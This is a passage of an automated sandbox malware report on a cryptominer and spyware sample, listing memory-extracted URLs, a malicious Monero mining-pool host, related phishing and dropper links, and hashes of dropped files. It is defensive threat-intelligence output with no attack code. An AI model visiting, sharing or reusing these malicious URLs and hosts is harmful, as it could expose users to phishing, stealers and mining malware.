                                                                                  https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000006.00000003.1369934811.0000022ADE678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000006.00000003.1370089560.0000022ADE66A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370421200.0000022ADE668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://172.94.1qdialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://login.windows.net/common/oauth2/authorizeltipOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.ver)svchost.exe, 00000002.00000002.1398746540.0000016359062000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://powerpoint.office.comsvchost.exe, 0000006B.00000000.1599616250.00000184E28CD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1371055435.0000022ADE65C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://g.live.com/odclientsettings/ProdC:svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://dynamic.tsvchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370296542.0000022ADE649000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://g.live.com/odclientsettings/Prod-C:svchost.exe, 00000002.00000003.1203500301.0000016358DD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://login.windows.net/common/oauth2/authorize19gOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000002.00000003.1203500301.0000016358DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://powerpoint.office.comSRD13svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1605347716.00000184E2C79000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1605693530.00000184E2CFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://xmrig.com/docs/algorithmsdialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://outlook.comSRD1-svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		low
                                                                                                                              https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1371055435.0000022ADE65C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://word.office.comSRD1#svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeened(OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://login.windows.net/common/oauth2/authorizespacexOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://ctldl.wsvchost.exe, 00000069.00000000.1576416010.000001B311C96000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeoggerpOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizenOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000006.00000002.1371073026.0000022ADE677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370002682.0000022ADE671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.1370376221.0000022ADE632000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public IPs

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                72.21.81.240
                                                                                                                                                		unknownUnited States
                                                                                                                                                		15133EDGECASTUSfalse
                                                                                                                                                44.196.193.227
                                                                                                                                                		monerooceans.streamUnited States
                                                                                                                                                		14618AMAZON-AESUStrue

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                192.168.2.13
                                                                                                                                                192.168.2.23
                                                                                                                                                192.168.2.14
                                                                                                                                                127.0.0.1

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                Analysis ID:1408951
                                                                                                                                                Start date and time:2024-03-14 13:58:53 +01:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 13m 8s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:79
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:61
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.spyw.evad.mine.winZIP@108/24@1/6
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 57.1%
                                                                                                                                                HCA Information:Failed
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .zip

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, MoUsoCoreWorker.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.56.210.93, 20.114.59.183
                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                • Execution Graph export aborted for target Setup.exe, PID 1036 because there are no executed function
                                                                                                                                                • Execution Graph export aborted for target Setup.exe, PID 6476 because there are no executed function
                                                                                                                                                • Execution Graph export aborted for target jnxsifnrdetl.exe, PID 4248 because there are no executed function
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                • VT rate limit hit for: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                13:59:25API Interceptor38240x Sleep call for process: svchost.exe modified
                                                                                                                                                13:59:33API Interceptor63x Sleep call for process: powershell.exe modified
                                                                                                                                                14:00:18API Interceptor261554x Sleep call for process: winlogon.exe modified
                                                                                                                                                14:00:19API Interceptor251436x Sleep call for process: lsass.exe modified
                                                                                                                                                14:00:24API Interceptor222105x Sleep call for process: dwm.exe modified
                                                                                                                                                14:00:36API Interceptor612x Sleep call for process: spoolsv.exe modified
                                                                                                                                                14:00:39API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                14:00:58API Interceptor91x Sleep call for process: OfficeClickToRun.exe modified
                                                                                                                                                14:01:00API Interceptor253x Sleep call for process: explorer.exe modified
                                                                                                                                                14:01:02API Interceptor59x Sleep call for process: sihost.exe modified
                                                                                                                                                14:01:09API Interceptor40x Sleep call for process: ctfmon.exe modified
                                                                                                                                                14:01:10API Interceptor30x Sleep call for process: dasHost.exe modified
                                                                                                                                                14:01:30API Interceptor1x Sleep call for process: RuntimeBroker.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                72.21.81.240https://dl.silhcdn.com/1dc240dfb4eb6c5fGet hashmaliciousUnknownBrowse
                                                                                                                                                  https://controller-software.minebea-intec.com/PC-Tools/IndicatorBrowser2.1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    https://ssoauth01.screenconnect.com/Bin/ScreenConnect.Client.exe?h=instance-w08c5r-relay.screenconnect.com&p=443&k=BgIAAACkAABSU0ExAAgAAAEAAQBtb%2FXciCJO5hHyAR3NG5qwkHgKE4K5jxeGBs35Nlncjh1l6g%2B23I88rvlqmL%2FU%2BHDK35q63nY%2BZ%2BacGdqbEGbCs9%2BC5ELjJTyrUFEL0gVqegeArzyszYoIS4ijuI8mGGKzW9tytW5tQhqCPuQeWdSbe0f0ttBWIUk6MfP0L7WpImwpbDzvxtmyMWSxZ8JZg39F6e1w8cQHzLH0aqJX9uvQgIvogbJB0mFXWURVi9ErahW%2BwkXWptsr99acbACeWvHhej11zT9ZPHMMaluuXTiYnS06xPJTJZglT5hvMbl15uReewBWhhwiEVa2S%2BD%2BCQEQGLsz1dpJNd543dQllUPh&s=2d10f7e2-3372-4377-b81f-4a7ead155b40&i=&e=Support&y=Guest&r=Get hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                      MDE_File_Sample_891148f4a44499290ad196a880d833428cfc751e.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                        Summaryform_TgQFBSAqdC.zipGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                          MDE_File_Sample_41d8deaea0ddb3ed4d88efabf26f376282b04177.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                            SecuriteInfo.com.Program.RemoteAdminNET.1.9196.7480.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                              file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                SecuriteInfo.com.Program.RemoteAdminNET.1.5343.8667.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                  OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    44.196.193.227SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                      GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                        yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                          BraveCrashHandler.exeGet hashmaliciousNanominer, XmrigBrowse
                                                                                                                                                                            GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                              SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exeGet hashmaliciousXmrigBrowse

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                monerooceans.stream17ae2fbf36a41622374adfd3b1608e08.10.drGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 44.224.209.130
                                                                                                                                                                                SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.196.193.227
                                                                                                                                                                                GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.196.193.227
                                                                                                                                                                                yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.196.193.227
                                                                                                                                                                                GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.196.193.227
                                                                                                                                                                                GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.224.209.130
                                                                                                                                                                                vHAgn4Dx00.exeGet hashmaliciousAveMaria, UACMe, XmrigBrowse
                                                                                                                                                                                • 44.224.209.130
                                                                                                                                                                                vABMEuk0Ie.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.196.193.227
                                                                                                                                                                                SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.196.193.227
                                                                                                                                                                                jJ4UO2hOfp.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                • 44.224.209.130

                                                                                                                                                                                ASNs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                EDGECASTUShttps://onedrive.live.com/redir?resid=D557EC206FFB7160!18763&authkey=!AJvgTwV6CZ5apWY&page=View&wd=target(Quick%20Notes.one%7Ca4839789-5727-4f4a-8cb7-8f7ca326b900/GEOlogik%20-%20Wilbers%20%20Oeder%20GmbH%7C792c61c4-fbc3-4124-a7a0-3de0f5bd7abc/)&wdorigin=NavigationUrlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                • 152.195.19.97
                                                                                                                                                                                https://tracker.club-os.com////campaign/click?46960ms46960gId444d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=46960%25E3%2580%2582exoatlettechchn%25E3%2580%2582com/poop/46960%2F%2FUm9ueS5EUkVTU0VMQUVSU0BGQU5DLkZHT1YuQkU=&Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 192.229.173.207
                                                                                                                                                                                Acrobat_Set-Up.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 152.195.19.97
                                                                                                                                                                                BraveBrowserSetup-BRV002.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 152.195.19.97
                                                                                                                                                                                BraveBrowserSetup-BRV002.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 152.195.19.97
                                                                                                                                                                                file.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                • 192.229.211.108
                                                                                                                                                                                SecuriteInfo.com.Trojan.PackedNET.2742.9443.15673.exeGet hashmaliciousGlupteba, Mars Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                                                • 192.229.211.108
                                                                                                                                                                                https://prezi.com/i/view/NEzvDMiy71AZ2uVfaGcJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 192.229.210.163
                                                                                                                                                                                EXTERNAL New Fax received from eFax - Wednesday 13 March 2024.msgGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                • 192.229.211.108
                                                                                                                                                                                https://assets-usa.mkt.dynamics.com/eafd3d58-f4cb-ee11-9073-6045bd050506/digitalassets/standaloneforms/a5094c23-a3e0-ee11-904c-6045bd02a830Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 152.199.4.44
                                                                                                                                                                                AMAZON-AESUShttps://interacty.me/projects/2eea3318531e89d3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 34.202.177.173
                                                                                                                                                                                https://claycohra.knack.com/untitled-app#elderly-housing-corporation/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 3.219.104.238
                                                                                                                                                                                file.exeGet hashmaliciousAmadey, GluptebaBrowse
                                                                                                                                                                                • 18.205.93.0
                                                                                                                                                                                https://tracker.club-os.com////campaign/click?46960ms46960gId444d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=46960%25E3%2580%2582exoatlettechchn%25E3%2580%2582com/poop/46960%2F%2FUm9ueS5EUkVTU0VMQUVSU0BGQU5DLkZHT1YuQkU=&Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 3.220.144.103
                                                                                                                                                                                https://form.questionscout.com/65f2bbc50f97807913312091Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 34.234.52.18
                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                • 18.205.93.0
                                                                                                                                                                                S78uYNGteB.apkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 52.73.154.19
                                                                                                                                                                                Acrobat_Set-Up.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 18.211.200.223
                                                                                                                                                                                SecuriteInfo.com.ELF.Agent-AIN.23345.28475.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 54.5.113.144
                                                                                                                                                                                SecuriteInfo.com.ELF.Mirai-AJJ.2909.8691.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 52.202.47.207

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                No context

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                C:\Windows\Temp\sidneyeifgjd.sysjeNQRsRgBe.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                  RemiTool v2.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                    SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                      Sms OTP Bypass.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          SecuriteInfo.com.Win64.TrojanX-gen.27837.22565.exeGet hashmaliciousPureLog Stealer, XmrigBrowse
                                                                                                                                                                                            xwizlLLNtX.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                                                              gQZvXi6Osc.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                                                                zLAr8hkDsu.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                                                                  udgE7Q3gs6.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                    Entropy (8bit):0.35999246155449205
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:6xdoaaD0JOCEfMuaaD0JOCEfMKQmDWxdoaaD0JOCEfMuaaD0JOCEfMKQmD:3aaD0JcaaD0JwQQTaaD0JcaaD0JwQQ
                                                                                                                                                                                                    MD5:72CF57557891086FFCF5496120EBA415
                                                                                                                                                                                                    SHA1:3905AB3A7DD5933B4E17401B911B5FDB17AFE62B
                                                                                                                                                                                                    SHA-256:6C3BE79F6B818243D6538453077C36C23E90106349D7F080AAD7C1D1745FAFE2
                                                                                                                                                                                                    SHA-512:9F94E19ED7BF3C0D629AA177959093D580E7FE59479066BA033C3F3D78E63C2BBC7DCA950A415B5239AC28F5B839E11410D988AA8E762B72F316F31DC4E894F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                                                    Entropy (8bit):0.7995225156260047
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWj:QAgN8nj/ka4
                                                                                                                                                                                                    MD5:64532D8A1B4EA9FEAF11979AAE0DCD85
                                                                                                                                                                                                    SHA1:54CDFB65215977EA8B29C113F19D72B2263348F9
                                                                                                                                                                                                    SHA-256:782C26530D5085EF208598AAD42C22BB86107D4C24E11D6AB4446385979EBFEB
                                                                                                                                                                                                    SHA-512:4239144A044B2718740EBF042706BBAED6F38081A25BAAF425ABA731210470231DD4377AABC2293500D254E8812F6E4772B2DA5FEE3D80511DAB01BD9D484693
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9ad319e8, page size 16384, Windows version 10.0
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                                                    Entropy (8bit):0.661673741907652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:bSB2ESB2SSjlK/BkfiQWy10MctJ+t9ka4XQ0wYkr3g16D2UPkLk+k4t4eCu3uKRT:bazaHL7uka4DU2UGRF3p3pvHzrHBHz
                                                                                                                                                                                                    MD5:1ACCBE89EF93E2945F773F8E732D46E7
                                                                                                                                                                                                    SHA1:B9784BF804BE947FF47DA0D8935B839D062C45B2
                                                                                                                                                                                                    SHA-256:110235962ECACCDDFA7A3826C5960CC364BB95A09DDE237FA62ADA0C63A3C9DC
                                                                                                                                                                                                    SHA-512:696E14179DFC54F2C2F047D5A281972E57653C23A777C55957C747876F43B18C2C0A9C106FB84D4C8BFE7FDC673C83DB14CCF5E0E76B3B88CE354AEB498EB12A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:....... ...............X\...;...{......................0............|...;...|..h.|..........|..0...........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................3......|.?.................*.J.....|...........................#......0.......................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                                    Entropy (8bit):0.07368868268858289
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:9yl/lUetYeIn5rH//lMrmoxorBrk//lacmo//lallUZ+/l/Q:UltNzmrX+rmourdkXoXoXA7
                                                                                                                                                                                                    MD5:19216A613A01633EB222CE507898CFCE
                                                                                                                                                                                                    SHA1:95C7A7B40E5C5B998C230B3A16693884E092D4D7
                                                                                                                                                                                                    SHA-256:AFCAEF1314335A4887A2BF9ED44E7EE2D36863ECE31A4B2AA85F8C9B4278D686
